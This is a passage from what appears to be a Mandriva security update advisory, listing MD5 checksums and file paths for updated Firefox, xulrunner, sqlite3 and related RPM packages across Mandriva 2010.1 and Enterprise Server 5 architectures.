85b3826eeb31a9aa076d812e0b033fe2 2010.1/x86_64/beagle-gui-0.3.9-40.14mdv2010.2.x86_64.rpm 9bf2efc37288ab863deae5a824dbe50a 2010.1/x86_64/beagle-gui-qt-0.3.9-40.14mdv2010.2.x86_64.rpm 494b0ceba524ee3d54e718173a134c2a 2010.1/x86_64/beagle-libs-0.3.9-40.14mdv2010.2.x86_64.rpm e46b7ca18a34233df87a9d936ad4bb84 2010.1/x86_64/firefox-3.6.17-0.1mdv2010.2.x86_64.rpm 22a39de7d1d7bdada1e59a88b0aa15b7 2010.1/x86_64/firefox-af-3.6.17-0.1mdv2010.2.x86_64.rpm 82fbe86619de87a67c82aa637d66eff9 2010.1/x86_64/firefox-ar-3.6.17-0.1mdv2010.2.x86_64.rpm 667ff12e314e1077d53f857239efcc0e 2010.1/x86_64/firefox-be-3.6.17-0.1mdv2010.2.x86_64.rpm fc89c99c3848b35835a52f7cc0b32472 2010.1/x86_64/firefox-bg-3.6.17-0.1mdv2010.2.x86_64.rpm e0c03dd7a31141fabbad70ad068d5d34 2010.1/x86_64/firefox-bn-3.6.17-0.1mdv2010.2.x86_64.rpm 93a8115d530b7fc9174e1a75c314dfdf 2010.1/x86_64/firefox-ca-3.6.17-0.1mdv2010.2.x86_64.rpm 9388cb5df3bc5d5411d48bc1914edbbc 2010.1/x86_64/firefox-cs-3.6.17-0.1mdv2010.2.x86_64.rpm eafa8fd9f5275d3d5e379341d8ce0c68 2010.1/x86_64/firefox-cy-3.6.17-0.1mdv2010.2.x86_64.rpm b996034e9f08a25be24f1a89277585cd 2010.1/x86_64/firefox-da-3.6.17-0.1mdv2010.2.x86_64.rpm 028096333315b17aae3e5f0dc962e24a 2010.1/x86_64/firefox-de-3.6.17-0.1mdv2010.2.x86_64.rpm d7baf446d20b9786cc28c44d5d0202b5 2010.1/x86_64/firefox-devel-3.6.17-0.1mdv2010.2.x86_64.rpm 3b852a87c33cd0e75d103e097e7d320a 2010.1/x86_64/firefox-el-3.6.17-0.1mdv2010.2.x86_64.rpm 1a19015cab0401d728fe04814c3835a5 2010.1/x86_64/firefox-en_GB-3.6.17-0.1mdv2010.2.x86_64.rpm 26de6d4b2135970f0020b67981dac233 2010.1/x86_64/firefox-eo-3.6.17-0.1mdv2010.2.x86_64.rpm df2fc9e8d2db93ae0812401cb19b231d 2010.1/x86_64/firefox-es_AR-3.6.17-0.1mdv2010.2.x86_64.rpm 8a3b33018ff6f84a9c014df086c5963d 2010.1/x86_64/firefox-es_ES-3.6.17-0.1mdv2010.2.x86_64.rpm b070fca7be42864ee1f7406fc89ac3e2 2010.1/x86_64/firefox-et-3.6.17-0.1mdv2010.2.x86_64.rpm fad4b35f38578d2c72bf750779908db3 2010.1/x86_64/firefox-eu-3.6.17-0.1mdv2010.2.x86_64.rpm c98e6a802a3fdc802558fda32e38fbf4 2010.1/x86_64/firefox-ext-beagle-0.3.9-40.14mdv2010.2.x86_64.rpm 83ad811c61d33c3f1d3efff51f650e49 2010.1/x86_64/firefox-ext-blogrovr-1.1.804-13.11mdv2010.2.x86_64.rpm dd27de519ed45b4911a5854c2aebba01 2010.1/x86_64/firefox-ext-mozvoikko-1.0.1-2.11mdv2010.2.x86_64.rpm d8f0a5553ecae1ea98badfeafd5bb495 2010.1/x86_64/firefox-ext-r-kiosk-0.8.1-2.11mdv2010.2.x86_64.rpm da8529bf5c54bb7089aac5fa34e08fa2 2010.1/x86_64/firefox-ext-scribefire-3.5.2-2.11mdv2010.2.x86_64.rpm 74be4a3dd584ac9614204ec0eee5a76c 2010.1/x86_64/firefox-ext-weave-sync-1.1-5.11mdv2010.2.x86_64.rpm e15889b13af1fca608a2207defcf395f 2010.1/x86_64/firefox-ext-xmarks-3.6.14-2.11mdv2010.2.x86_64.rpm 2fb1491b1038a0fbf4d4b77e77de5d2d 2010.1/x86_64/firefox-fi-3.6.17-0.1mdv2010.2.x86_64.rpm 87aff9990ee27579705647b5f677d1a0 2010.1/x86_64/firefox-fr-3.6.17-0.1mdv2010.2.x86_64.rpm f5fa6b37709ebfc386e8f3186c9bf3e5 2010.1/x86_64/firefox-fy-3.6.17-0.1mdv2010.2.x86_64.rpm f0e79b94e45222e0e811e557be2bc0ad 2010.1/x86_64/firefox-ga_IE-3.6.17-0.1mdv2010.2.x86_64.rpm 58ef7cb55ebd74749501aa199ded7ae3 2010.1/x86_64/firefox-gl-3.6.17-0.1mdv2010.2.x86_64.rpm 384a1b23643a1651465968c608691e07 2010.1/x86_64/firefox-gu_IN-3.6.17-0.1mdv2010.2.x86_64.rpm 7757a222e9272b89a437885e6ce5b31f 2010.1/x86_64/firefox-he-3.6.17-0.1mdv2010.2.x86_64.rpm 8dded891812eab92931d01af412a3ebf 2010.1/x86_64/firefox-hi-3.6.17-0.1mdv2010.2.x86_64.rpm 3a1f1a4d2e0504dfffebeedac06fd757 2010.1/x86_64/firefox-hu-3.6.17-0.1mdv2010.2.x86_64.rpm e342a02179f742297e55beca9a6b8ca6 2010.1/x86_64/firefox-id-3.6.17-0.1mdv2010.2.x86_64.rpm 036b31e88314428055f6e4a2e66fa493 2010.1/x86_64/firefox-is-3.6.17-0.1mdv2010.2.x86_64.rpm bec6bbcfcfdbaf95cdfcd7080feafc33 2010.1/x86_64/firefox-it-3.6.17-0.1mdv2010.2.x86_64.rpm 590f80b0284b1d97100c84b0c0d1635e 2010.1/x86_64/firefox-ja-3.6.17-0.1mdv2010.2.x86_64.rpm b7f833b9c8b8c0c730ff79e2376925ed 2010.1/x86_64/firefox-ka-3.6.17-0.1mdv2010.2.x86_64.rpm 72ac06e97023f95de8bf03493178b68f 2010.1/x86_64/firefox-kn-3.6.17-0.1mdv2010.2.x86_64.rpm d6280f4d487fb74bb58134b86d3b02e0 2010.1/x86_64/firefox-ko-3.6.17-0.1mdv2010.2.x86_64.rpm 2902d4911e52992ff1965776fa55773b 2010.1/x86_64/firefox-ku-3.6.17-0.1mdv2010.2.x86_64.rpm 6749cc63b9ed02c76638143da1a69567 2010.1/x86_64/firefox-lt-3.6.17-0.1mdv2010.2.x86_64.rpm 7fdeafa0a786ffe52ceafc32171b0008 2010.1/x86_64/firefox-lv-3.6.17-0.1mdv2010.2.x86_64.rpm 8a5611333bc64fef5d911ffebed01b71 2010.1/x86_64/firefox-mk-3.6.17-0.1mdv2010.2.x86_64.rpm f26f30c2518c55c4db7ea283cdd980cb 2010.1/x86_64/firefox-mr-3.6.17-0.1mdv2010.2.x86_64.rpm ab55f04a3ca359de4160f36b157dcfdb 2010.1/x86_64/firefox-nb_NO-3.6.17-0.1mdv2010.2.x86_64.rpm 037558db1519c9ebf7fc964ddaf9101d 2010.1/x86_64/firefox-nl-3.6.17-0.1mdv2010.2.x86_64.rpm 3645335e57393ac183a626016de84c4f 2010.1/x86_64/firefox-nn_NO-3.6.17-0.1mdv2010.2.x86_64.rpm 39c1c6d029a0ddaee7f167684622ba47 2010.1/x86_64/firefox-oc-3.6.17-0.1mdv2010.2.x86_64.rpm f24638c4c92fb8c06d7a6f7ffb83ef57 2010.1/x86_64/firefox-pa_IN-3.6.17-0.1mdv2010.2.x86_64.rpm 6501493cba87fdc0380a8f8d9998ed1a 2010.1/x86_64/firefox-pl-3.6.17-0.1mdv2010.2.x86_64.rpm 99ac520214b2fc84dc5ad26a407d5473 2010.1/x86_64/firefox-pt_BR-3.6.17-0.1mdv2010.2.x86_64.rpm 03e2274cd6b99e00822fca70318d6baa 2010.1/x86_64/firefox-pt_PT-3.6.17-0.1mdv2010.2.x86_64.rpm fe066759fb775dfcafe76fc54fdf61c6 2010.1/x86_64/firefox-ro-3.6.17-0.1mdv2010.2.x86_64.rpm 30700e22cea9e182e020adeafb4d0507 2010.1/x86_64/firefox-ru-3.6.17-0.1mdv2010.2.x86_64.rpm ec4f873d8e05b8ab45a19bab482b4949 2010.1/x86_64/firefox-si-3.6.17-0.1mdv2010.2.x86_64.rpm 4835225ee74f3d8f62c0541823582f2c 2010.1/x86_64/firefox-sk-3.6.17-0.1mdv2010.2.x86_64.rpm 2054bedb2c948d9a46c2ec0dae110c38 2010.1/x86_64/firefox-sl-3.6.17-0.1mdv2010.2.x86_64.rpm 61df79a4f54f3bf36eb133465de48cd4 2010.1/x86_64/firefox-sq-3.6.17-0.1mdv2010.2.x86_64.rpm 4e9afd7cd78caed3fdd00ed795f5b597 2010.1/x86_64/firefox-sr-3.6.17-0.1mdv2010.2.x86_64.rpm 8b3ccf29a6280da169e1ed82c065f6e0 2010.1/x86_64/firefox-sv_SE-3.6.17-0.1mdv2010.2.x86_64.rpm 179197adbd3ba25592cbd581108ce5ea 2010.1/x86_64/firefox-te-3.6.17-0.1mdv2010.2.x86_64.rpm d737d709fd550410ebfefdd338758d6e 2010.1/x86_64/firefox-th-3.6.17-0.1mdv2010.2.x86_64.rpm e5936f4c07fb77132172ac02e94ca477 2010.1/x86_64/firefox-tr-3.6.17-0.1mdv2010.2.x86_64.rpm 8192f4a4f31a5b16bd5db044485261d6 2010.1/x86_64/firefox-uk-3.6.17-0.1mdv2010.2.x86_64.rpm 29e39d3eeea7fc56548d8453fe9d562d 2010.1/x86_64/firefox-zh_CN-3.6.17-0.1mdv2010.2.x86_64.rpm f938602338d91d92eda1a0b3bdb1fce7 2010.1/x86_64/firefox-zh_TW-3.6.17-0.1mdv2010.2.x86_64.rpm 2cc9893d0e15e8d6a387dc1858f49095 2010.1/x86_64/gjs-0.6-4.11mdv2010.2.x86_64.rpm a4bd11a7f67b3e932916effa4528c6a7 2010.1/x86_64/gnome-python-extras-2.25.3-18.11mdv2010.2.x86_64.rpm 95cee5d067e61a517fb1a5d117171ec0 2010.1/x86_64/gnome-python-gda-2.25.3-18.11mdv2010.2.x86_64.rpm 91d3209a56123c6d6a0aa694347e872c 2010.1/x86_64/gnome-python-gda-devel-2.25.3-18.11mdv2010.2.x86_64.rpm 34df1edf5e0be2a08528ce1662de63be 2010.1/x86_64/gnome-python-gdl-2.25.3-18.11mdv2010.2.x86_64.rpm d137508cb856c9076d4dc31f5dd7f306 2010.1/x86_64/gnome-python-gtkhtml2-2.25.3-18.11mdv2010.2.x86_64.rpm 21bb6b0f05bca7b9a6940e8e45dd3a96 2010.1/x86_64/gnome-python-gtkmozembed-2.25.3-18.11mdv2010.2.x86_64.rpm 6e524a6d0f00d4c3959c578766e98049 2010.1/x86_64/gnome-python-gtkspell-2.25.3-18.11mdv2010.2.x86_64.rpm e2073b5a80d38b4a04d8ff834d75efdd 2010.1/x86_64/lemon-3.7.4-0.1mdv2010.2.x86_64.rpm 92f6e1c3916ea0eaf167422cb7664879 2010.1/x86_64/lib64gjs0-0.6-4.11mdv2010.2.x86_64.rpm 000331cedd3b7c59b6f31b9299e2db51 2010.1/x86_64/lib64gjs-devel-0.6-4.11mdv2010.2.x86_64.rpm de19237a71b5ac9dd2197557eca1dac8 2010.1/x86_64/lib64sqlite3_0-3.7.6.2-0.1mdv2010.2.x86_64.rpm 81e39244f2d0ca52dad100b3084f4eae 2010.1/x86_64/lib64sqlite3-devel-3.7.6.2-0.1mdv2010.2.x86_64.rpm e7d7123b05e43b447830713352e58799 2010.1/x86_64/lib64sqlite3-static-devel-3.7.6.2-0.1mdv2010.2.x86_64.rpm 141b29ac9c15a48b64f28d26ce97046a 2010.1/x86_64/lib64xulrunner1.9.2.17-1.9.2.17-0.1mdv2010.2.x86_64.rpm 676a62b038fe6e012ae7b868ee472268 2010.1/x86_64/lib64xulrunner-devel-1.9.2.17-0.1mdv2010.2.x86_64.rpm 83fb7cc91a80a62ed919b74401feb855 2010.1/x86_64/mozilla-thunderbird-beagle-0.3.9-40.14mdv2010.2.x86_64.rpm 52cec62fcccfe088c54a215eb3e7cd39 2010.1/x86_64/sqlite3-tools-3.7.6.2-0.1mdv2010.2.x86_64.rpm 1951e652f207a2344b3460d0c06a1c17 2010.1/x86_64/xulrunner-1.9.2.17-0.1mdv2010.2.x86_64.rpm 58f9aa8aa5f6ec8558166674e1224998 2010.1/x86_64/yelp-2.30.1-4.11mdv2010.2.x86_64.rpm f03639972840639a315ace5577a3f7d7 2010.1/SRPMS/beagle-0.3.9-40.14mdv2010.2.src.rpm 1b407792bc53910f470fef2aa107c4db 2010.1/SRPMS/firefox-3.6.17-0.1mdv2010.2.src.rpm cffc7531253d821db2a606e56993d5e1 2010.1/SRPMS/firefox-ext-blogrovr-1.1.804-13.11mdv2010.2.src.rpm 84480ce74b027244dc64794cbae17d07 2010.1/SRPMS/firefox-ext-mozvoikko-1.0.1-2.11mdv2010.2.src.rpm ec8e51d467efb46c6fad4d9a5e64af51 2010.1/SRPMS/firefox-ext-r-kiosk-0.8.1-2.11mdv2010.2.src.rpm 9626186349beb04c41ac48c21bf268b1 2010.1/SRPMS/firefox-ext-scribefire-3.5.2-2.11mdv2010.2.src.rpm e65da7beca8fa7edffd5a70da28161ec 2010.1/SRPMS/firefox-ext-weave-sync-1.1-5.11mdv2010.2.src.rpm c4ce7eec413e557445f66f2b167899a7 2010.1/SRPMS/firefox-ext-xmarks-3.6.14-2.11mdv2010.2.src.rpm 55bd4776f283283a5c8ab1906658b9c9 2010.1/SRPMS/firefox-l10n-3.6.17-0.1mdv2010.2.src.rpm e0bcbb8764bd02ec459e7252aec2d042 2010.1/SRPMS/gjs-0.6-4.11mdv2010.2.src.rpm 66f6688cea914918243d9afeefc443b2 2010.1/SRPMS/gnome-python-extras-2.25.3-18.11mdv2010.2.src.rpm f8304df757bbcc2d16d3198e3fda3d23 2010.1/SRPMS/lemon-3.7.4-0.1mdv2010.2.src.rpm 8b4cc9318b6004ece98b4d1057cea92d 2010.1/SRPMS/sqlite3-3.7.6.2-0.1mdv2010.2.src.rpm 6a7d4ed599fbf868d4a02a9e8d2933c8 2010.1/SRPMS/xulrunner-1.9.2.17-0.1mdv2010.2.src.rpm 8f9d8865473f416ec554aa017d0dccb1 2010.1/SRPMS/yelp-2.30.1-4.11mdv2010.2.src.rpm Mandriva Enterprise Server 5: cd1e9a42a006aa5adda100679d0cbc93 mes5/i586/firefox-3.6.17-0.1mdvmes5.2.i586.rpm 71d37ac9f0293811bd4520e03dc54157 mes5/i586/firefox-af-3.6.17-0.1mdvmes5.2.i586.rpm 7f0e73e51c41f69de839fc2755d88853 mes5/i586/firefox-ar-3.6.17-0.1mdvmes5.2.i586.rpm 0d3d203788e1c81779a5f9ca31ddb022 mes5/i586/firefox-be-3.6.17-0.1mdvmes5.2.i586.rpm b40754b7ecfd225d8b8192055d275635 mes5/i586/firefox-bg-3.6.17-0.1mdvmes5.2.i586.rpm 28c6bc31a2e4332cc3c0f3b815cf9550 mes5/i586/firefox-bn-3.6.17-0.1mdvmes5.2.i586.rpm 6fd253979012ac8302baa07b257bfa4c mes5/i586/firefox-ca-3.6.17-0.1mdvmes5.2.i586.rpm 28354e9b7daf2993f1f4e550045a20e3 mes5/i586/firefox-cs-3.6.17-0.1mdvmes5.2.i586.rpm 4f4b94dc2cfd87ddaec38d5fb5eb0400 mes5/i586/firefox-cy-3.6.17-0.1mdvmes5.2.i586.rpm 9ebfff1af214cbee62fa37079e2bd7e6 mes5/i586/firefox-da-3.6.17-0.1mdvmes5.2.i586.rpm f549fe10cf71e4ffacfb60882521b2df mes5/i586/firefox-de-3.6.17-0.1mdvmes5.2.i586.rpm 93305ea82f3f0db7a8818cba8a6de264 mes5/i586/firefox-devel-3.6.17-0.1mdvmes5.2.i586.rpm 27dd2d2ecc56883660cd01c1c05c0a64 mes5/i586/firefox-el-3.6.17-0.1mdvmes5.2.i586.rpm eb242443939e1ec934e1a03e927dfcc7 mes5/i586/firefox-en_GB-3.6.17-0.1mdvmes5.2.i586.rpm 70a5b46a1a85af189111d5c903c04e6f mes5/i586/firefox-eo-3.6.17-0.1mdvmes5.2.i586.rpm 045d6b80f006d42b49404862b01228e2 mes5/i586/firefox-es_AR-3.6.17-0.1mdvmes5.2.i586.rpm 4303d5138af4a2ebe3cf3d2ca6a1917d mes5/i586/firefox-es_ES-3.6.17-0.1mdvmes5.2.i586.rpm e75f75febb938386c4900bc1af8af042 mes5/i586/firefox-et-3.6.17-0.1mdvmes5.2.i586.rpm 452955a2a43a62918d190e022c075442 mes5/i586/firefox-eu-3.6.17-0.1mdvmes5.2.i586.rpm 9a248c3c9431b97f65e105824c9361ec mes5/i586/firefox-fi-3.6.17-0.1mdvmes5.2.i586.rpm e404680e82e06af73a581a5c4b508156 mes5/i586/firefox-fr-3.6.17-0.1mdvmes5.2.i586.rpm 13cc1a0d0c0841dae79534feb33e3df3 mes5/i586/firefox-fy-3.6.17-0.1mdvmes5.2.i586.rpm 6e1e56d7854c9f78a1c9813ff929eacc mes5/i586/firefox-ga_IE-3.6.17-0.1mdvmes5.2.i586.rpm a40d04e4b23e315d5138669edcac7f46 mes5/i586/firefox-gl-3.6.17-0.1mdvmes5.2.i586.rpm 003ab3759ad09849c7c75b100cb0493b mes5/i586/firefox-gu_IN-3.6.17-0.1mdvmes5.2.i586.rpm 2c0793b1f9650e6f2fee84cce9614d8c mes5/i586/firefox-he-3.6.17-0.1mdvmes5.2.i586.rpm 15074456de86609bd2f8200e5d9242d4 mes5/i586/firefox-hi-3.6.17-0.1mdvmes5.2.i586.rpm dd2f72897646c7b30dc12775dd82a2d4 mes5/i586/firefox-hu-3.6.17-0.1mdvmes5.2.i586.rpm 29c5aa93bdca6f566cbdcabe4a8e3b9b mes5/i586/firefox-id-3.6.17-0.1mdvmes5.2.i586.rpm 163d2fa3c63d7863ccf7f7bbaf4d0e11 mes5/i586/firefox-is-3.6.17-0.1mdvmes5.2.i586.rpm 47069560437e511140ba5ff1b63291d8 mes5/i586/firefox-it-3.6.17-0.1mdvmes5.2.i586.rpm 6cc9d026a8569b790ba2fcbd8e24a862 mes5/i586/firefox-ja-3.6.17-0.1mdvmes5.2.i586.rpm c2a4b813bfed1a0771505aba9a64b67a mes5/i586/firefox-ka-3.6.17-0.1mdvmes5.2.i586.rpm ae479a045c885c2c887e38f43220a831 mes5/i586/firefox-kn-3.6.17-0.1mdvmes5.2.i586.rpm adbb4ae02ac0592bb6c3164da559fcdd mes5/i586/firefox-ko-3.6.17-0.1mdvmes5.2.i586.rpm 4dade34dbe0124df10e7bc9b944223ad mes5/i586/firefox-ku-3.6.17-0.1mdvmes5.2.i586.rpm 24eb9a94cce3d8ff6108aab01814eddf mes5/i586/firefox-lt-3.6.17-0.1mdvmes5.2.i586.rpm d26f9486102084657ce92ece26daa619 mes5/i586/firefox-lv-3.6.17-0.1mdvmes5.2.i586.rpm 36d6e7bded0d41872f598a3ee7ed3ce3 mes5/i586/firefox-mk-3.6.17-0.1mdvmes5.2.i586.rpm 26fe1eac37c64f4449e5640e2b4fd623 mes5/i586/firefox-mr-3.6.17-0.1mdvmes5.2.i586.rpm 593c15394af9f6269820bef95f5044d2 mes5/i586/firefox-nb_NO-3.6.17-0.1mdvmes5.2.i586.rpm d20476061cc8797e78728e36f26a0e1f mes5/i586/firefox-nl-3.6.17-0.1mdvmes5.2.i586.rpm 7367469b54aba0e799ea78f8e6c57623 mes5/i586/firefox-nn_NO-3.6.17-0.1mdvmes5.2.i586.rpm f57fa32c9d04b1efa5f0bc610aed9310 mes5/i586/firefox-oc-3.6.17-0.1mdvmes5.2.i586.rpm 1373e0a9b280d0955af3cdac49287e3c mes5/i586/firefox-pa_IN-3.6.17-0.1mdvmes5.2.i586.rpm 4db37cc34f95f2050549b2b94ec67e85 mes5/i586/firefox-pl-3.6.17-0.1mdvmes5.2.i586.rpm cf755af35925c6c0039ee29f9c0029d0 mes5/i586/firefox-pt_BR-3.6.17-0.1mdvmes5.2.i586.rpm a2f110045a0ddfff974990f60c4fe64b mes5/i586/firefox-pt_PT-3.6.17-0.1mdvmes5.2.i586.rpm fbe53c4ec1d600b4c42ab3dfa377f15f mes5/i586/firefox-ro-3.6.17-0.1mdvmes5.2.i586.rpm f656ab01daaea25add74112516d57f89 mes5/i586/firefox-ru-3.6.17-0.1mdvmes5.2.i586.rpm 2903d0b3ce028351f70f416088b119ec mes5/i586/firefox-si-3.6.17-0.1mdvmes5.2.i586.rpm 11e1d9a1c1ea08e9ca6edf1c4dead3b7 mes5/i586/firefox-sk-3.6.17-0.1mdvmes5.2.i586.rpm 7a926b7da38eb87ec265a2e8630b405c mes5/i586/firefox-sl-3.6.17-0.1mdvmes5.2.i586.rpm 23d443bb392eebe34cc23645390e5db3 mes5/i586/firefox-sq-3.6.17-0.1mdvmes5.2.i586.rpm 1c863cc5d1ff0ca73463e3fadb49826d mes5/i586/firefox-sr-3.6.17-0.1mdvmes5.2.i586.rpm eefc88ca28558a2aa84916ab68c8784b mes5/i586/firefox-sv_SE-3.6.17-0.1mdvmes5.2.i586.rpm a370f38efa21a805eb7ffcaa3b0ff4e6 mes5/i586/firefox-te-3.6.17-0.1mdvmes5.2.i586.rpm 1938a177263949976d41d331ad88a6fd mes5/i586/firefox-th-3.6.17-0.1mdvmes5.2.i586.rpm 411b0440df40c11a6b6afd2678f88194 mes5/i586/firefox-tr-3.6.17-0.1mdvmes5.2.i586.rpm 19a879814fca5ab264c360a3c2a7bc94 mes5/i586/firefox-uk-3.6.17-0.1mdvmes5.2.i586.rpm 21fb65bdb7b2d072cd856b89f82b5110 mes5/i586/firefox-zh_CN-3.6.17-0.1mdvmes5.2.i586.rpm 48aeb095031ec9bb857d43eaa787c3f3 mes5/i586/firefox-zh_TW-3.6.17-0.1mdvmes5.2.i586.rpm ab0bdd9c6e0ac64cece89ab65dc561c5 mes5/i586/gnome-python-extras-2.19.1-20.27mdvmes5.2.i586.rpm c8d2cbcd8b1aaa8a2a51bcdbb0b2b910 mes5/i586/gnome-python-gda-2.19.1-20.27mdvmes5.2.i586.rpm ec5227d35f1449aaf7efe40f7fbb318f mes5/i586/gnome-python-gda-devel-2.19.1-20.27mdvmes5.2.i586.rpm 7b452ca6f2d66637d394660ea03d9d2a mes5/i586/gnome-python-gdl-2.19.1-20.27mdvmes5.2.i586.rpm fb3c82427b3e7431ad8a258fc9eff104 mes5/i586/gnome-python-gtkhtml2-2.19.1-20.27mdvmes5.2.i586.rpm ab2354cebdc0b8e2aa173ead5532b4ac mes5/i586/gnome-python-gtkmozembed-2.19.1-20.27mdvmes5.2.i586.rpm b534f20edd5f3757349a8c4a50d0a0e6 mes5/i586/gnome-python-gtkspell-2.19.1-20.27mdvmes5.2.i586.rpm 61a1d120a4e4570fb72dad35226769b4 mes5/i586/lemon-3.7.4-0.1mdvmes5.2.i586.rpm 69e75f2466743e6d1400e6fe780040fd mes5/i586/libsqlite3_0-3.7.6.2-0.1mdvmes5.2.i586.rpm a3d24e02c7564b24ba0e1c84e47c1199 mes5/i586/libsqlite3-devel-3.7.6.2-0.1mdvmes5.2.i586.rpm 92f31472aa1598fa93e62e343e58c451 mes5/i586/libsqlite3-static-devel-3.7.6.2-0.1mdvmes5.2.i586.rpm dc34aa3a20ded6207c29571b1442dc61 mes5/i586/libxulrunner1.9.2.17-1.9.2.17-0.1mdvmes5.2.i586.rpm b403f1b78eca1fa166eed7314589d6c3 mes5/i586/libxulrunner-devel-1.9.2.17-0.1mdvmes5.2.i586.rpm 266697bb330b9b48b1c10a5e9f728d63 mes5/i586/sqlite3-tools-3.7.6.2-0.1mdvmes5.2.i586.rpm 076f2a699a8ef53d6c276be266a9af9f mes5/i586/xulrunner-1.9.2.17-0.1mdvmes5.2.i586.rpm f07e55998cada837f50c314833682dbc mes5/i586/yelp-2.24.0-3.28mdvmes5.2.i586.rpm 08e3395dcf5d79aad887b04fccbeca1a mes5/SRPMS/firefox-3.6.17-0.1mdvmes5.2.src.rpm ace71a7037acfef2e442c0f1d472a558 mes5/SRPMS/firefox-l10n-3.6.17-0.1mdvmes5.2.src.rpm f625973d73bdc2c483e16d69d86ed015 mes5/SRPMS/gnome-python-extras-2.19.1-20.27mdvmes5.2.src.rpm 5e72aa3d556fbaadb3feba514417c97f mes5/SRPMS/lemon-3.7.4-0.1mdvmes5.2.src.rpm 42a930801375eab6b2532bbe97f2938d mes5/SRPMS/sqlite3-3.7.6.2-0.1mdvmes5.2.src.rpm 6e2762193b3083bdc03e89d638c1ca59 mes5/SRPMS/xulrunner-1.9.2.17-0.1mdvmes5.2.src.rpm a0115bd0847187c4a21ded2734c2567a mes5/SRPMS/yelp-2.24.0-3.28mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: bcbc626f149907e7db0aa880b0986682 mes5/x86_64/firefox-3.6.17-0.1mdvmes5.2.x86_64.rpm 56ce0c4dc89e1f2626b26b61ba0eb1f9 mes5/x86_64/firefox-af-3.6.17-0.1mdvmes5.2.x86_64.rpm 2d8db2677a37b8a1ae081c2a30807bdf mes5/x86_64/firefox-ar-3.6.17-0.1mdvmes5.2.x86_64.rpm 8f13b9c5f31e3baf114d8ff1c4662a0f mes5/x86_64/firefox-be-3.6.17-0.1mdvmes5.2.x86_64.rpm 9b1498c677c64c9a4b5e003f614b66de mes5/x86_64/firefox-bg-3.6.17-0.1mdvmes5.2.x86_64.rpm 17c1cf44b4a4f6acb460bb4745f608bb mes5/x86_64/firefox-bn-3.6.17-0.1mdvmes5.2.x86_64.rpm d24d45ec96e39a93d22a9304e7cf67ac mes5/x86_64/firefox-ca-3.6.17-0.1mdvmes5.2.x86_64.rpm 2c9635ebd5eb01ee812abe1e60fc1a90 mes5/x86_64/firefox-cs-3.6.17-0.1mdvmes5.2.x86_64.rpm 9d6e1fb46850b1ed7e541739e283ac2f mes5/x86_64/firefox-cy-3.6.17-0.1mdvmes5.2.x86_64.rpm 8f7cd04bb995712880ad9f552b08bcea mes5/x86_64/firefox-da-3.6.17-0.1mdvmes5.2.x86_64.rpm 3dc2f1215bd97c95e307bea6d857502b mes5/x86_64/firefox-de-3.6.17-0.1mdvmes5.2.x86_64.rpm c238ee61325ec66dc6b25e617890c2c7 mes5/x86_64/firefox-devel-3.6.17-0.1mdvmes5.2.x86_64.rpm 15fc79ff42e1c5040ff074762ecf9a08 mes5/x86_64/firefox-el-3.6.17-0.1mdvmes5.2.x86_64.rpm f8739033ea7805998e813121b932974d mes5/x86_64/firefox-en_GB-3.6.17-0.1mdvmes5.2.x86_64.rpm 37d15a0e10ea45f53052cb975480ec9c mes5/x86_64/firefox-eo-3.6.17-0.1mdvmes5.2.x86_64.rpm 1080d11107b386d5847a3900bd7f82ec mes5/x86_64/firefox-es_AR-3.6.17-0.1mdvmes5.2.x86_64.rpm eb471420d0ec8c797fed7d9737eb7cd1 mes5/x86_64/firefox-es_ES-3.6.17-0.1mdvmes5.2.x86_64.rpm 466a7b12b2720ba3a2a097a042334d19 mes5/x86_64/firefox-et-3.6.17-0.1mdvmes5.2.x86_64.rpm 62f7faefd2691977ac089b1230777fd1 mes5/x86_64/firefox-eu-3.6.17-0.1mdvmes5.2.x86_64.rpm 43e52f4084a1edb8fc3a98842cccf94f mes5/x86_64/firefox-fi-3.6.17-0.1mdvmes5.2.x86_64.rpm 2e02f68eaea320129bf14462b3f3c1e3 mes5/x86_64/firefox-fr-3.6.17-0.1mdvmes5.2.x86_64.rpm 8b906e8ddb2fc609d706262f892066cb mes5/x86_64/firefox-fy-3.6.17-0.1mdvmes5.2.x86_64.rpm 6c66cdeb261ccf59226e4940325e3ed9 mes5/x86_64/firefox-ga_IE-3.6.17-0.1mdvmes5.2.x86_64.rpm 61d5f0c94ba1fc1d9075d27e6575450d mes5/x86_64/firefox-gl-3.6.17-0.1mdvmes5.2.x86_64.rpm 7879ff61a4cb6c2f5b9b501f7d76ccce mes5/x86_64/firefox-gu_IN-3.6.17-0.1mdvmes5.2.x86_64.rpm 2e95af25ff50975161d817274c70a435 mes5/x86_64/firefox-he-3.6.17-0.1mdvmes5.2.x86_64.rpm e0de5a247cca79950b88b367d7c03eb6 mes5/x86_64/firefox-hi-3.6.17-0.1mdvmes5.2.x86_64.rpm a109e4717ed021a0bf05af9c8364af9b mes5/x86_64/firefox-hu-3.6.17-0.1mdvmes5.2.x86_64.rpm c6750aaa0a1e2b68757ef92bdc9b8820 mes5/x86_64/firefox-id-3.6.17-0.1mdvmes5.2.x86_64.rpm e78ecd366539d9e8826de2d9b9d53475 mes5/x86_64/firefox-is-3.6.17-0.1mdvmes5.2.x86_64.rpm 46d2e1106df05c0a23eb51774e8f3b94 mes5/x86_64/firefox-it-3.6.17-0.1mdvmes5.2.x86_64.rpm daf9972befd078246c1b894da7113bf4 mes5/x86_64/firefox-ja-3.6.17-0.1mdvmes5.2.x86_64.rpm 6b80fa3bb62ddeddd402730ac426fa4c mes5/x86_64/firefox-ka-3.6.17-0.1mdvmes5.2.x86_64.rpm d03328157f05d2d17c4bca57b67a80dd mes5/x86_64/firefox-kn-3.6.17-0.1mdvmes5.2.x86_64.rpm cb0715cd4a81594dcfb2c12ded2f0da9 mes5/x86_64/firefox-ko-3.6.17-0.1mdvmes5.2.x86_64.rpm 915e0f528feef5d0c9977e1226ff054b mes5/x86_64/firefox-ku-3.6.17-0.1mdvmes5.2.x86_64.rpm 5999f9b990455d35c6b7309ce24a5521 mes5/x86_64/firefox-lt-3.6.17-0.1mdvmes5.2.x86_64.rpm ec301658c5d0735dbd4d5bb73b49719f mes5/x86_64/firefox-lv-3.6.17-0.1mdvmes5.2.x86_64.rpm 69cbe297fd4885895dfffc2f82c97613 mes5/x86_64/firefox-mk-3.6.17-0.1mdvmes5.2.x86_64.rpm cc375fff57a189f0eed8b0127b5bac0f mes5/x86_64/firefox-mr-3.6.17-0.1mdvmes5.2.x86_64.rpm 1dea9c1581fb71783f921b44c467f894 mes5/x86_64/firefox-nb_NO-3.6.17-0.1mdvmes5.2.x86_64.rpm 2efeef9a98c5ec444083ee6c0ec28a9e 